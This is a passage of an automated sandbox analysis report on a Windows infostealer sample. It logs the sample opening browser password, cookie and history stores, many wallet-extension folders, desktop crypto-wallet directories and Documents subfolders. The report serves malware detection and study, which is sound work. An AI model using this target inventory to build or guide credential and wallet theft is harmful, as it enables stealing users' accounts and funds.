              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
              Source: Lisect_AVT_24003_G1B_131.exe, 00000000.00000002.2207932092.00000000007AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: Lisect_AVT_24003_G1B_131.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\Application Data\Mozilla\FirefoxJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\WSHEJMDVQCJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\ZIPXYXWIOYJump to behavior
              Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1B_131.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
